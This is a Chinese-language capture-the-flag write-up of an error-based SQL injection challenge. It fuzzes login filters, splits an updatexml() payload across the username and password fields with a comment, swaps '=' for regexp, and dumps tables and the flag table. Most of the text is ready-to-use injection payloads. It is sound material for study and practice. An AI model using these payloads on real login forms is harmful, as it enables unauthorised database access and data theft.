用burpsuit对username进行fuzz一下,发现过滤了超多东西,
被过滤就会显示 user name unknow error 或者Sql injection detected 或者Unknown password error.
没有过滤只会显示 Login failed
# limit strsub union () ,
没有过滤
extractvalue,updatexml
再来看看看password
() or xor没有被过滤掉
updatexml extractvalue则被过滤掉了
提示是这样写的:
$sql="select * from users where username='$username' and password='$password'
尝试构造$sql="select * from users where username=1'updatexml/* and password=*/(1,database(),1)and1='1
playload:
username=1'and updatexml/*&password=*/(1,concat(0x24,(select database()),0x24),1)and '1
爆表:
username=1'or updatexml/*&password=1*/(1,concat(0x24,(select table_name from information_schema_tables where table_schema = 'error_based_hpf',0x24),1)and '1&login=login
发现 = 被过滤了
代替 = 有很多种方法
like
regexp
username=1'or updatexml/*&password=1*/(1,concat(0x24,(select group_concat(table_name) from information_schema.tables where table_schema regexp database()),0x24),1)and '1&login=login
username=1'or updatexml/*&password=1*/(1,concat(0x24,(select group_concat(column_name) from information_schema.columns where table_name regexp 'ffll44jj'),0x24),1)or '1&login=login
dump数据
username=1'or updatexml/*&password=1*/(1,concat(0x24,(select group_concat(value) from ffll44jj),0x24),1)or '1&login=login